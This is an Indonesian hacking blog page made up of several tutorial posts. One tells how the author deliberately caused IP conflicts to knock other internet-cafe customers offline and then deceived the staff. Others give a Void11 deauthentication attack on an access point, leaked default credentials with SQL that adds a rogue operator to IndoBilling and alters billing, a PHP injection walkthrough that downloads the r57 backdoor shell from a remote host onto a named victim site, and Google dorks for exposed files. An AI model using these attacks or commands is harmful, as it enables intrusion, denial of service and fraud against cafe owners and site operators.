Breaking News

Wifi

Internet

Linux

Writing

Selasa, 08 Januari 2008

Bentrokkan Saja IPnya & Ambil Bandwidth-nya

Author : lirva32
lirva32 [at] yahoo [dot] com

Sore ini gue pulang dari kantor... niatnya sih mau main internet di cafe kawasan Kemang Pratama abis jenuh dengan suasana kantor. Berangkatlah gue sendirian menuju cafe untuk menghilangkan kejenuhan dan kepenatan. Gue naik angkot K-25 menuju Rawang Panjang terus naik angkot lagi K-11 menuju Bantar Gebang. Gue turun sebelum Bantar Gebang tepatnya di pintu 2 Kemang Pratama... akhirnya sampai juga gue di Cafe yang gue tuju... hhhmmm Cafe yang anggun.. romantis... bisa pesen makanan apa saja.. Steak... Croisant or lain-lainya deh... yang pasti bisa menghilangkan kepenatan hari ini...
Sampai di cafe, gue langsung ditunjukkan oleh pelayannya untuk menduduki komputer No. 5. Sang Pelayan langsung menyalakan komputer yang akan aku gunakan.... hhhhhmmm manntaappp nih.. komputer-komputer yang lain belum hidup, hanya ada 2 user lain yang sedang ngenet.... itu artinya ada kesempatan untuk mengembangkan ide.... ha..ha..ha...
Akhirnya tanpa banyak tanya, gue langsung saja log on pada billing... yang sebelumnya gue berusaha mencoba untuk membypass log in awalnya walaupun tidak bisa karena memang gue 'ga bisa yyeeeee.... lol
Akhirnya gue mulai browsing sana-browsing sini ditemani BlackcurrentTea... minuman hangat yang sangat gue dambakan.. karena bisa menimbulkan suasana hening dan santai... ;)
Hiikkssss.. karena di Cafe ini kalo ngenet bayarnya mahal.. gue punya ide untuk membentrokkan IP komputer-komputer yang belum dihidupkan... dasar teorinya gini : komputer yang belum aktif (belum dinyalakan) jika IP dibentrokkan... maka ketika komputer tersebut diaktifkan tidak akan mendapatkan IP karena IPnya sedang dipergunakan oleh komputer lain... sehingga tidak bisa melakukan koneksi inet... ;)
Karena faktor inilah akhirnya gue mulai iseng... munculah ide gila untuk membentrokkan IP yang dimiliki komputer lain... Apa efeknya kalo IP dibentrokkan...??? hhhhmmmm komputer yang bentrok IP-nya pasti 'ga bisa ngakses internet... bayangkan kalau saja ada 12 komputer yang dipergunakan user.. dan gue bentrokan IP-nya... hhhmmmm pasti gue kenyang badwidth nih...karena tidak ada user lain yang bisa mengakses internet... ha..ha..ha...hhhaalllaahhh ide gila nih mannnn......
Gue akan bentrokkan IP komputer yang dipakai oleh user lain... jadi IP komputer yang sedang gue gunakan tidak boleh dibentrokkan... ingat!!! IP komputer yang gue gunakan tidak dibentrokkan...!!!

Uji coba yang gue lakukan :
[+] Apakah bisa membuka "My Netwok Places"
uuppsss, ternyata pada langkah kali ini gue bisa membukanya... sehingga gue bisa melihat IP Address yang dipergunakan dan itu artinya gue bisa melakukan kegiatan2 berikutnya, perhatikan gambar dibawah ini :





Apa yang bisa disimpulkan dari gambar2 tersebut :
[1] IP Address yang dipergunakan adalah IP Address static
[2] IP Address yang terlihat adalah IP Adress untuk komputer yang sedang gue pergunakan
[3] Gateway yang terlihat kemungkinan adalah alamat Proxy, bisa juga alamat Router

Dari 3 (tiga) info tersebut mari kita kembangkan analisis forensic, adapun analisis yang gue dapatkan adalah sbb :

[1] Perhatikan gambar diatas, di komputer yang gue gunakan di kasih IP : 200.10.10.5
Nah, karena gue duduk di komputer No. 5, maka Komputer yang gue pake IP-nya berakhir dengan angka x.x.x.5, jadi untuk komputer No. 1 diberikan IP static : 200.10.10.1, komputer No. 2 diberikan IP static : 200.10.10.2, dan seterusnya sampai jumlah komputer terakhir.
Nah, IP tersebutlah yang akan saya bentrokkan... yaitu IP : 200.10.10.1 - 200.10.10.4, 200.10.10.6 - 200.10.10.12.
Uuuupppsss, tadinya saya akan melakukan bentrokan semua IP yang tidak saya pergunakan... tapi agar operator warnet dan pelayan cafe tidak mencurigai aksi yang gue jalankan maka gue hanya membentrokkan IP : 200.10.10.1 - 200.10.10.4, 200.10.10.6 - 200.10.10.10, artinya nanti masih ada beberapa komputer yang bisa akses internet yaitu komputer dengan IP : 200.10.10.5 (komputer yang gue gunakan), 200.10.10.11 (komputer user 11), 200.10.10.12 (komputer user 12).
Sekali lagi.. jangan dibentrokkan semua IP karena akan mengudang curiga..!!!!.

[2] IP Gateway.. ya, jangan dibentrokkan.. karena akan mematikan akses internet yang sedang kita pergunakan.

[3] IP Billing... gue menganalisis kalau IP yang dipergunakan adalah IP tertinggi di class ini.. artinya tidak diantara : 200.10.10.1 - 200.10.10.12, memang gue tidak bisa memastikannya.. ini hanya analisa.. karena waktu itu gue tidak melakukan mass scanning. Mudah2an saja analisis kali ini benar.. dan ternyata pada aksi yang gue jalankan memang benar....

Bagaimana cara membentrokkanya :

1. Aktifkan Seetingan TCP/IP








Jangan lupa untuk melakukan proses "Disable" dan "Enable" pada devices NIC.

Hiikkssss... kini setelah beberapa menit gue melakukan bentrokan IP... masuklah 1 user baru... wwwahhh kali ini yang mau ngenet ce cantik... gaul.. n trendy... uupppsss, si Pelayan langsung mengantarnya ke komputer No. 7... jreng...jreng.... akhirnya ce itu ga bisa ngenet... dan sampai beberapa kali si Pelayan melakukan proses "restart"... ha...ha..ha... IP Static gitu loh... lol. Sampai akhirnya ada orang ke-8 masuk ke Cafe ini untuk ngenet... tapi semuanya pada pulang lagi.. komplen lagi... pulang lagi..komplen lagi.... ga bisa browsing.
Ternyata aku jadi pemakai inet sejati... ga ada pesaing yang membuat bandwidth gue berkurang. Kini tinggal gue dan 2 (dua) user lainnya yang bisa memakai internet..
wwaaahhh, pelayan dan operatornya mulai curiga.... mata mereka menatap wajah gue seketika dan sewaktu2... hhaaallllaaahhhh.... ga enak juga sih gue...
Pada menit ke 75 datang user baru... dan ditunjukkan di komputer No. 4, jreennng..jreennnggg... inetrnetnya tetap tidak bisa.... wwwiissss lengkap sudah penderitaan si pemilik warnet..... Maaf mas.. maaf mba... gue cuma pengen akses internet yang cepet... swearrr... tidak ada maksud lain yang bertujuan untuk merugikan.... ;)
Mata pelayan + operator semakin curiga... akhirnya pada menit ke 90... gue membebaskan IP-IP tersebut dengan membuangnya dari daftar... dan dengan sengaja gue membentrokkan IP komputer yang gue pakai, yaitu IP : 200.10.10.5, habislah riwayat internet yang gue gunakan... dengan santainya gue memanggil pelayan "Mas.. kenapa yah, kok tiba2 inetrnetnya ga bisa dipakai...???" hhhmmmm... pelayannya juga bingung... yang tadinya mencurigai gue... akhirnya beralih ke user lain.. user yang tidak komplain akses intenetnya.... beeebbbaasss eeeuuyyyyy......

Tulisan ini merupakan kisah nyata yang gue lakukan pada hari Senin, 28 Agustus 2007.
Mohon maaf yang sebesar2nya buat pemilik Cafe #E###... gue cuma iseng2 aja... mulailah diproteksi... agar user biasa seperti gue 'ga bisa membuka settingan IP... jangan lupa pake bandwidth manager.
Gue berharap, tulisan ini tidak dipergunakan pada tangsi2 penting..... apalagi di kampus tempat gue ngajar... gue ingin materi ini jadi perhatian dan pembelajaran saja....

.thx
lirva32

Read more ...

Fake AP -- Mendirikan Ribuan Access Point Palsu

wah... lirva32 bikin tulisan lagi nih...
kali ini lirva32 mau ngebahas tentang bagaimana cara membuat Fake AP.
Fake AP menghasilkan ribuan access point palsu,
gunanya adalah dapat menipu pengakses jaringan wireless dan juga dapat membingungkan hasil pelacakan melalui aplikasi wardrivers, NetStumbler.


Persiapannya nih.... :
1. WiFi Card berbasis chipset Prism2/2.5/3
2. Download aplikasi Fake Ap dari : http://www.blackalchemy.to/project/fakeap/


Cara meramu Fake Ap nya begini :

1. Compile the Host AP driver dan bisa Anda ambil disini - http://hostap.epitest.fi
Anda juga membutuhkan CVS snapshot driver untuk meng 'enable ' fungsi
MAC switching.
2. Edit 'fakeap.pl' untuk mereflect settingan dan paths.
3. Run 'fakeap.pl' dengan user : root
4. Have fun... Wink yyeeeaaahhhh........

Usage: fakeap.pl --interface wlanX [--channel X] [--mac XX:XX...]
[--essid NAME] [--words FILENAME] [--sleep N] [--vendors FILENAME]
[--wep N] [--key KEY] [--power N]

--channel X ---> Use static channel X
--essid NAME ---> Use static ESSID NAME
--mac XX:XX... ---> Use static MAC address XX:...
--words FILE ---> Use FILE to create ESSIDs
--sleep N ---> Sleep N Ssec between changes, default 0.25
--vendor FILE ---> Use FILE to define vendor MAC prefixes
--wep N ---> Use WEP with probability N where 0 < N <= 1
--key KEY ---> Use KEY as the WEP key. Passed raw to iwconfig
--power N ---> Vary Tx power between 1 and N. In milliwatts


.thx
lirva32

dedicated to : Anakku "Faiza Debian", All echo|staff,AllCrewLabBinaInsani,
MyAlmamater : FTI_UnivBudiLuhur,buat * yang baca tulisan ini.....
juga buat mereka yang telah memberikan banyak kontribusi utk kemajuan
bangsa ini........

Read more ...

Melumpuhkan Access Point dengan Void11

Wah, lirva32 mau ngajarin iseng2 nih... kali ini lirva mau melakukan DoS pada Access Point...
Jadi nanti AP akan dibanjiri dengan paket2 data... kalo udah banjir tuh AP bakalan ngedrop..
Gimna caranya...?? nanti dulu... lirva mau menjelaskan aplikasinya dulu....

Void11
Void11 merupakan salah satu aplikasi yang digunakan unutk melakukan mass flooding terhadap Access Point.
Void11 memiliki jenis metode attack, yaitu :

1. Deauthenticate Clients (default mode)
Dengan metode ini, void11 akan melakukan flooding WLAN dengan 'deauthentication packets' sehingga
client yang terautentikasi didalam jaringannya akan ngedrop dan terputus dari jaringan WLAN.

2. Authentication Flood
Dengan metode ini, void11 akan melakukan flooding ke Access Point dengan 'authentication packets (random client MACs)'

3. Association Flood
Dengan metode ini, void11 akan melakukan flooding dengan association packets (random client MACs)


Persiapan :
+ komputer | laptop yang udah ada wificard dengan chipset Prism.
+ Lakukan Wardriving utk mendapatkan MAC Address + SSID AP si target
+ Donlod void11 dari : http://lirva32.org/images/void11-0.2.0.tar.bz2
+ Konfigurasi :

cd /tools/wifi/void11-0.2.0/console

iwconfig wlan0 mode master

iwpriv wlan0 hostapd 1

./void11_hopper


alternatif void_hopper mode juga bisa meprgunakan :

iwconfig wlan0 channel 6 (set card to channel 6)


Penggunaan :
void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID]


Penyerangan :
Misalkan saja kita ingin melakukan penyerangan terhadap sebuah AP, maka saya awali dulu dengan melakukan wardriving...biasanya saya mepergunakan kismet.
Dari hasil wardriving saya mendapatkan :

SSID : linksys
mAC : 00:06:BF:64:AB:35


Siapakan penyerangan sbb :
void11_penetration wlan0 -D -t 1 -S linksys -B 00:06:BF:64:AB:35


wah... APnya ngedrop... restart..... he..he....
selamat menikmati... lirva tidak bertangung jawab atas tindakan destruktif apapun....

Referensi :
www.wirelessdefense.org

Shoutz :
. echo|staff : y3dips,m0by,the_day,comex,z3r0byt3,k-159,c-a-s-e,s'to,anonymous
. Anakku : Faiza Debian Navisa... yang mengisi hari2ku dengan keceriaannya...
. My Friends : Mas Arif "s4k1tjiw4',az001, sevior,ocep_wie,sugeng_p,r34d3r,cbug,cyb3rtank,
cr4sh3r,,#SolpotCrew, #BekasiHacker,#kecoak, #kalengbekas, #samarinda_hack, #aikmel, #renjana and AllNewbieHacker, komar@bms.
. Asistenku : MadeSipit,Aghe,Arie
. MyAlamamater : FTI-BudiLuhurUniversity

writen by : lirva32 [http://lirva32.org]

Read more ...

Mengenal IP Command

Di bawah ini adalah perintah-perintah yang berhubungan dengan jaringan. Untuk melakukan perintah-perintah tersebut Anda harus masuk ke MS DOS Prompt.

ipconfig /all
Menampilkan informasi konfigurasi koneksi, misalnya Host Name, Primary DNS Type, Ethernet Adapter LAN.

ipconfig /displaydns
Menampilkan DNS Cache.

ipconfig /flushdns
Menghapus DNS Cache

ipconfig /release
"Menghapus" semua koneksi IP Address.

ipconfig /renew
Membuat IP Address baru untuk adapter tertentu.

ipconfig /registerdns
Melakukan refresh DNS dan meregister kembali koneksi DNS.

ipconfig /showclassid
Menampilkan informasi DHCP Class.

ipconfig /setclassid
Mengubah DHCP Class ID

control netconnections
Menampilkan Network Connection.

ping
Contoh: ping www.klik-kanan.com
Melakukan test koneksi ke situs www.klik-kanan.com. Semakin sedikit % loss-nya makan semakin baik koneksinya.

tracert
Menampilkan informasi IP Address route.

netstat
Menampilkan informasi koneksi TCP/IP yang sedang aktif.

route
Menampilkan local route.

hostname
Menampilkan nama komputer.

Read more ...

Security Vulnerability Pada IndoBilling

[x] Apa itu indobilling ?? yaahhh... semacam aplikasi billing untuk warnet. mbolehin kita untuk make komputer abis kita login ke billing server alias komp OP.

Ngerti bahasne po ora dab ???? pokok e kaya gt lah ...
[x] Trus permasalahanya apa ???
sebenernya ga rumit2x amat sih mslh nya, cm koneksi nya ke database yang
ngga ke-filter.
[x] Trus untungnya apa cb kl mbaca blog mu sampe abis ???
ya macem-macem. nubah nama warnet nya, alamat warnet nya,
registrasi warnet nya, nama OP nya, bahkan mbuat km bs ngenet
dengan gratis. (yg terakhir jgn dilakuin ya ... d0s4 !! kan rejekinya udh ada
sendiri-sendiri)
[x] Emang caranya gmn c ???
manfaatin aj SQL Manager. eg. SQLyog.
[x] Trus user name sama passwordnya apa ??? kan butuh itu biar bs konek.
Tar deh gmpng.
[x] IP nya tau dr mn ??
ya liat aja pake netstat.
[x] Oww ... gt ya ... menarik jg nih. Jelasin dong !!!

kay .... pertama kali kita mesti tau IP nya server. dr mn kita tau ???
pake netstat aj.

caranya ::
buat file "netstat.bat" yang isinya berikut ini

============== NETSTAT.BAT ============= [don't copy paste this line]
netstat >> netstat.txt
open netstat.txt
========= END OF NETSTAT.BAT =========== [don't copy paste this line]

fungsi dari perintah ini adalah mencetak hasil dari "netstat" ke dalam sebuah file netstat.txt lalu membuka file tersebut. hal ini perlu dilakukan karena indobilling akan melakukan close terhadap comand prompt. (mulai deh make bahasa formal. biasa aj napa bung !!!)
nahhh .. dr hasil netstat itu, bs diliat port 3306 (port default na mySQL) lagi konek kmn.

contoh ::

========= RESULT OF NETSTAT ==================
Proto Local Address Foreign Address State
TCP 127.0.0.1:49218 Owner-PC:49219 ESTABLISHED
TCP 127.0.0.1:49219 Owner-PC:49218 ESTABLISHED
TCP 127.0.0.1:49220 Owner-PC:49221 ESTABLISHED
TCP 127.0.0.1:49221 Owner-PC:49220 ESTABLISHED
TCP 192.168.10.16:49168 cs31:5050 ESTABLISHED
TCP 192.168.10.16:49173 sip36:https ESTABLISHED
TCP 192.168.10.16:49559 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49560 202.96.64.144:55944 ESTABLISHED
TCP 192.168.10.16:49561 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49562 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49565 192.168.10.1:3306 ESTABLISHED
==============================================

keliatan kan kalo port 3306 lagi konek ke IP 192.168.10.1. Nah IP itu tu IP na Billing Server.

Sekarang tinggal konek ke DB mySQL pake SQLyog. yg belom punya SQLyog bs didapet disini Download SQLyog.

/*mlm ni masih lumayan ad temennya, nge-blog bareng 'eross fyuuhhh ... tetep ngantuk jg.
(cukup ....kelamaan banget kata sambutan nya !!! ini bukan upacara bendera bung !!! )*/

kemaren udh sampe di bahasan "mengetahui IP Billing Server", sekarang mulai untuk konek ke DB mySQL nya server.
yang diperluin untuk bisa konek ke DB adalah user name, password dan IP address nya server, yang msh jd pertanyaan adalah "password & username" nya apa ???

==============================
info koneksi ke mySQL server Indo Billing
username : root
password : root1
==============================

[x]nah lo ... tau dari mana tuw ?? emang developer nya temen mu ??? ato di kasih tau di webshit nya ???
yaahh... sedikit jail lah, buka aja file exe-nya pake Winhex, pasti username+password kesimpan di exe-nya sebagai ASCII, jd bisa langsung kebaca tanpa perlu convert2xan. but, jgn langsung maen buka aj, exe-nya diprotect dengan compressor lo, tp jg ga perlu kuatir karena udah ada de-compressor nya. yang jelas compressor nya make UPX, de-compressor nya nyari ndiri aja ya ...

hmmm.... udh deh, kunci udh ditangan, tinggal eksekusi aj.
[x]eksekusi dari hongkong !!!! jelasin dong caranya !!!!!!
ya gampang aja, tinggal make SQLyog nya aja, masukin username, password ama host nya dengan data-data yang udah didapet sebelum nya. nama database dibiarkan kosong aja.
kalo udah terkoneksi dengan server, maka semua isi database nya bakal keliatan, nah kita bisa ngubah semua hal yang berhubungan dengan indobilling pada table "warnet".
misalnya kita pengen nambahin operator di billing server dengan username "cracker" dan password "cracker" yang full priviledges. bisa dilakukan dengan make GUI nya SQLyog atawa dengan menjalankan SQL command berikut ini :

============================================= [don't copy paste this line]
insert into operator (op_id,op_user,op_password,op_name,item,member,setup,report,close,send,billing,
op_editbilling,op_delbilling,op_editmember,op_delmember,op_edititem,op_delitem,
op_cancel)
values (22,'cracker',password('cracker'),'intruder','true','true','true','true','true',-
'true','true','Y','Y','Y','Y','Y','Y','Y')
============================================= [don't copy paste this line]

nahhh .... gampang kan.
kalo pengen ngubah harga billing juga bisa. SQL command nya kira-kira kaya gini ni
dimana,
-> format st_start = 'yyyy-mm-dd hh:mm:ss'
-> format st_name = 'nama username'
-> st_id = 'nomor KBU'
yang perlu diinget adalah nilai "st_start" harus waktu saat pengupdatean DB dilakuin. bisa juga dengan make fungsi SQL yaitu curdate() dan curdate().

============================================= [don't copy paste this line]
update station set st_start='2007-07-01 20:30:30',st_name='invisible_theater', st_duration='00:01:00' where st_id='1'
============================================= [don't copy paste this line]

dengan menggunakan fungsi curdate() dan curtime() kira-kira kaya gini ni.

============================================= [don't copy paste this line]
update station set st_start=concat(curdate(),' ',curtime()),st_name='invisible_theater', st_duration='00:01:00' where st_id='1'
============================================= [don't copy paste this line]

kalo emang pengen ngganti2x data laen nya silakan cari ndiri aja, ini kan sekedar contoh implementasi aj dab.

[x]hmmm.... boleh-boleh .......... trus kq bisa ya ??? ada apa c sebenernya??
yahhh sebenernya cm masalah setting doang, IP address yang bukan localhost diperbolehkan untuk connect langsung ke database dan melakukan edit. too simple right ?

kira-kira gitu deh ... silakan di uprek sendiri dengan kreatifitas sendiri ya ...

=======TUTOR DIAMBIL DARI JASAKOM WROTE BY invisible_theater=======
Read more ...

[Tutorial] PHP injection! [+contoh SHELL]

PHP injection...

pertama2 kita buka google.com

kita memasuk kan keyword nya di sana...

keyword nya yg di maksudkan di sini adalah dork,.. [bisa di lihat di millw0rm.com cari sendiri yg laen]

Kita mulai saja!

sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=
allinurl%3Aindex.php%3Fa%3Ddisplay



allinurl:index.php?a=display

allinurl <=- mencari setiap kata pada url...

index.php?a=display

sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=

http://www.historywebsites.com//index.php?a=display <=- tampil pada google..

http://www.historywebsites.com// <=- victim domain

index.php?a=display <=- DORK... kata kunci pada google...

http://www.historywebsites.com/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=


wwww.[domain].com/[path]/[file]?[BUGS]=[injector]?


injektor nya ada di link..


Quote:
http://www.geocities.com/yogya_hack/becak.tar.gz


Quote:
http://evilarmy.hostcentric.com/becak.tar.gz


itu adalah r57

hmm....
kalau sudah masuk ke web nya.. jangan lupa pasang backdoor...
cara nya ..

lwp-download http://www.geocities.com/yogya_hack/becak.tar.gz;ls -lia

jgn lupa... letak kan file nya di direktory yg permission drwxrwxrwx

find . -type d -perm 777

cari dari direktori skr sebuah direktori lain yang bisa di tlis...


find . -type f -perm 777 <=- mencari file

find / -type d -perm 777 <=- mencari dari direktori / (root)

Quote:
Backdoor PHP

1. lwp-download http://www.geocities.com/yogya_hack/becak.tar.gz
2. mv becak.tar.gz door.php

Contoh Hasil Site backdoor:

http://www.target.com/[path]/door.php




okeh...
sekian dl..
sector clear!!

Thanks Goes To:
ZeTH a.k.a s3t4n [Big thanks for finding the bugs!]
^MoNgOnDoW^ [Big thanks for lending the room!]
YF Xcode Big Famz! [thanks for support!]
^F_C^ [you know me!]
and all crewz!
#Becak & B-H-T crewz Vaksin13 OoN_BoY [makes me smile all the time!]


Salam Hangat
Jack-

diambil dari http://www.yogyafree.net/forum2

Read more ...

Google Hack Code "an old trics" [part_2]

Jasakom - Artikel ini terinspirasi dari situs http://johnny.ihackstuff.com tentang cara mendayagunakan Google dalam mencari celah keamanan website.

Jika Google menemukan alur data yang dapat mengekspos informasi sensitif mengenai organisasi anda, Google tidak akan ragu-ragu mengindeksnya. Mesin pencari ini tidak membedakan data yang diindeknya. Apa yang sebaiknya anda lakukan jika rahasia anda bocor ke publik? Anda dapat menggunakan Google untuk keuntungan anda melalui beberapa query pencarian yang spesifik. Inspirasi contoh tersebut dapat dilihat pada artikel dari Johnny Long. Dalam artikel ini Nitesh Dhanjani (konsultan keamanan IT) ini juga akan menunjukkan kepada anda bagaimana cara menggunakan Google API untuk otomasi proses pencarian Google terhadap berbagai celah keamanan.

Default Resource
Web server seringkali diinstall sebagai halaman web. Default halaman web ini tidak menunjukkan suatu celah keamanan, tapi mereka bisa mengidentifikasi sebuah konfigurasi default web server. Para attacker mengetahui bahwa halaman default seringkali menunjukkan suatu kelemahan web server.: Jika seorang administrator tidak berusaha menghapus default halaman "welcome" tersebut, sangat dimungkinkan bahwa dia tidak memblokir service "unused" atau menambahkan patch apapun. Query Google berikut ini berguna dalam mencari instalasi default Apache.

intitle:"Test Page for Apache"

Directory Listing
Web server seringkali menyediakan daftar direktori saat sebuah file default seperti index.html tidak ada dalam direktori tersebut. Terkadang, mereka menyimpan informasi sensitif dalam direktori, seperti query sederhana berikut ini:

intitle:"Index of" admin

Query diatas akan menghasilkan URL yang berisi directory listing dari /admin. Kebanyakan, para administrator membuat direktori yang bernama admin untuk menyimpan informasi sensitif. Berikut ini query yang berguna dalam mencari directory listing:

intitle:"Index of" .htpasswd
intitle:"Index of" stats.html
intitle:"Index of" backup
intitle:"Index of" etc
intitle:"Index of" finance.xls

Error Messages
Error Message dari web server dan aplikasinya dapat memberikan rincian lebih jauh. Perhatikan query Google berikut ini yang menunjukkan sebuah MySQL error. argumen yang diberikan bukanlah sebuah hasil resource MySQL yang valid. Query lainnya juga dapat membongkar informasi yang menarik diantaranya:

"A syntax error has occurred" filetype:ihtml
"ORA-00921: unexpected end of SQL command"

Remote ServicesBesar kemungkinan untuk menemukan VNC dan Terminal Service Server melalui query berikut ini. Kebanyakan administrator mengira user eksternal tidak akan mampu menemukan URL tersebut untuk mengakses informasi perihal remote service.

"VNC Desktop" inurl:5800
intitle:"Terminal Services Web Connection"

Google dapat juga mencari aplikasi administratif yang memungkinkan user untuk mengkonfigurasi system secara remote. Contohnya, berikut ini cara menempatkan instalasi phpMyAdmin:

"phpMyAdmin" "running on" inurl:"main.php"

Vulnerability Report
Nessus Framework bekerja dengan baik untuk mengidentifikasi celah keamanan suatu jaringan. Tool ini dapat membuat suatu laporan HTML mengenai celah keamanan tersebut. Seringkali, laporan langsung ada dalam direktori web root, menyebabkan server melayani semua user eksternal. Sebuah laporan Nessus bisa jadi berisi rincian celah keamanan yang ada dalam jaringan organisasinya. Berikut ini query yang digunakan Google untuk menemukan laporan berupa:

"This file was generated by Nessus" "Host Vulnerability Summary Report"

google_vulns.php
Contoh query yang disajikan dalam bagian sebelumnya hanya sebagian kecil dari query yang diketahui yang dapat menemukan celah keamanan menggunakan mesin pencari Google. Script google_vulns.php yang disajikan pada bagian ini menggunakan Google API untuk mencari query yang mirip dengan yang ada diatas. (Lihat source code Google Hack #55 untuk contoh sederhana tentang teknik query dengan Google API menggunakan PHP). Membaca sebuah file teks, signatures.txt, yang berisikan query Google dan keterangannya. Script tersebut berguna untuk mendapatkan sebuah domain name sebagai sebuah parameter untuk memaksa pencarian dalam suatu organisasi domain.

File signatures.txt berisi sebuah daftar query yang dipilih, mirip dengan yang ada pada bagian sebelumnya. Setelah setiap baris yang berisi query tertentu yang ada, terdapat suatu baris yang berisi penjelasan query tersebut. Script tersebut mengiterasi melalui file signatures.txt, dan pada setiap query, pencarian Google yang dihasilkan menggunakan Google API. Script tersebut menambahkan site: domain pada setiap query. Hal ini memungkinkan script tersebut ke target domain tertentu yang diberikan, sebuah parameter yang diberikan untuk script tersebut. Jika Google mengembalikan hasil yang valid, script tersebut menampilkan URL yang dapat digunakan, sepanjang dengan keterangan dari query tersebut.

Cara menjalankan script ini:
  • Kunjungi Google Web APi dan mendaftar untuk mendapatkan sebuah account. Mereka akan meng-email anda sebuah license key.
  • Download script google_vulns.php
  • Edit script tersebut dan ubah nilai variabel $key untuk menrefrleksikan Google license key anda.
  • Download signatures.txt dan tempatkan dalam direktori yang sama dengan google_vulns.php
  • Download GoogleSearch.wsdl dan tempatkan dalam direktori yang sama dengan google_vulns.php.
  • Download nusoap.php dari NuSOAP

Sekarang jalankan google_vulns.php dari baris perintah:

[bash]$ php ./google_vulns nama_target.com

Anda boleh juga menjalankan google_vulns.php dengan tanpa restriktif domain name, seperti .edu

[bash]$ php ./google_vulns .edu
************************************************
Search string: site:.edu intitle:"Index of" service.pwd
URL: http://[removed for this article]/
Directory listing contains service.pwd file(s)
************************************************
Search string: site:.edu intitle:"Index of" admin
URL: http://[nama_target]/admin/
Directory listing yang berisi file atau direktori administratif
************************************************
************************************************
Search string: site:.edu intitle:"Index of" .htpasswd
URL: http://[nama_target]/
Directory listing yang berisi file .htpasswd
************************************************
************************************************
Search string: site:.edu intitle:"Index of" stats.html
URL: http://[nama_target]/
Directory listing yang berisi stats.html yang bisa jadi
berisikan statistik webserver yang bermanfaat
************************************************
************************************************
Search string: site:.edu intitle:"Index of" .bash_history
URL: http://[nama_target]/
Directory listing yang berisi informasi bash history
************************************************
...
...
...

Script google_vulns.php hanya merupakan sebuah implementasi proof-of-concept. Bukan multi-thread, dan menurut kebijakan Google API dibatasi hanya mengembalikan 10 hasil per query. Untuk menampilkan pencarian yang lebih mendalam, gunakan sebuah tool pengganti seperti SiteDigger

Sebagaimana yang anda lihat dari output tersebut, sangat mudah untuk menggunakan Google dalam menemukan celah keamanannya. Karena script tersebut menggunakan Google untuk mencari celah keamanan, Target yang discan tidak akan mengetahui scan tersebut sampai seseorang mengguakan sebuah URL yang dihasilkan. Hal ini menjadikan jenis scanning ini benar-benar stealth.

Security Links
Script google_vulns.php mengekspos celah keamanan yang ada, pada kebanyakan kasus, hasil dari pengabaian dan kecerobohan merupakan praktek dasar terbaik. Beberapa contoh query yang diberikan dalam bagian ini berorientasi web server yang lemah. website Apache berisikan link untuk sejumlah resource yang dapat membantu administrator melindung webserver mereka, termasuk tip keamanan Apache httpd tutorial Apache httpd. Dengan catatan, administrator seharusnya secara rutin mengaudit direktori yang melayani sebagai web root untuk menjamin ada tidaknya content yang sensitif.

Aplikasi web serharusnya juga dibawah perlindungan untuk tidak menyediakan informasi sensitif kepada user. Kebanyakan celah keamanan aplikasi web terjadi akibat praktek coding yang tidak aman. Berikut beberapa resource yang dpat emembantu developer memabahami cara mengamankan aplikasi mereka.

Remote service, seperti VNC dan Terminal Service, seharusnya tidak dapat diakses secara langsung dari Internet. Memerlukan remote user untuk otentikasi ke VPN Gateway yang menggunakan strong encryption untuk mengakses remote service.

Kesimpulan
Saat ini terdapat resource keamanan online yang gratis, tidak ada alasan yang dapat dimaafkan untuk tidak mengamankankan host yang kritis guna mencegah tereksposnya data yang sensitif. Meski material yang disajikan pada artikel ini tidak menggambarkan semua kemungkinan celah keamanan, saya harap hal ini berguna dikalangan para administrator dan end user.

Saya tegaskan sekali lagi bahwa artikel tidak menunjukkan bagaimana cara menghacking suatu webserver atau "HOW TO", saya akan berterima kasih sekali dan belajar dari anda sekalian, bila anda mau menuliskan tentang "HOW TO"-nya disini, di JASAKOM..

Read more ...

Google Hack Code "an old trics" [part_1]

Google merupakan satu dari beberapa perusahaan sangat besar didalam bidang bisnis internet. Selain menjadi satu dari beberapa perusahaan terbesar di dunia internet ini, google juga ternyata menjadi satu dari beberapa website yang dapat dikatakan memiliki jumlah catatan pengunjung terbanyak, bagaimana tidak? Segala sesuatu yang sehubungan dengan internet sekarang ini semuannya dapat dicari melalui google, dari data mengenai masalah umum, berita, hingga informasi teknis.

Berbicara sehubungan dengan sub judul artikel ini, yang berbunyi “Taking Advantage of Technology”, dalam artikel kali ini saya akan sedikit membahas mengenai sebuah tehnik hacking yang menggunakan layanan yang diberikan daripada google ini sendiri.

Seperti yang telah kita ketahui, bahwa dengan adanya kemajuan teknologi dan semakin berkembangnya industri internet, tentu juga banyak hal hal lain yang terjadi sehubungan dengan system keamanan. Majunya sebuah jenis teknologi, tentu akan diimbangi dengan tehnik “men-dobrak” daripada system itu sendiri. Ini dapat kita lihat dalam kasus google.com sebab telah diketahui bahwa selain berguna sebagai sebuah search engine paling ampuh dengan database yang mencapai miliaran jumlahnya, google pun tidak dapat menutupi kenyataan bahwa banyak hacker yang menggunakan google.com sebagai sarana melakukan tindak “iseng-iseng” di internet, sebab selain dapat mencari data data seperti MP3, Film, Artikel, dan lain sebagainyam google pun memiliki kemampuan untuk dapat mencari data yang dapat digolongkan sebagai data rahasia.

Dengan menggunakan sedikit kemampuan unik, dan tentunya dengan menggunakan google.com sebagai sarana pencarian data, ternyata orang dapat menemukan banyak data sensitive di Internet. Data data yang dimaksud dengan data sensitive adalah data yang dapat digolongkan sebagai data pribadi, seperti nomor kartu kredit, dan password.

Menggunakan google tentunya sudah bukanlah merupakan sebuah hal yang aneh lagi bagi mereka yang sering menggunakan internet. Ditambah lagi, mengingat penggunaan daripada website google.com itu sendiri yang sangat user-friendly, penulis merasa tidak perlu untuk menjelaskan lebih lanjut mengenai metode mencari dengan menggunakan google. Dalam artikel ini kita akan membahas lebih kearah dasar metode pencarian serta pengenalan string dalam penggunaannya di google.com serta contoh contoh bentuk kalimat pencarian yang sangat membantu dalam melakukan google hacking nantinya.

Tehnik Dasar Pencarian

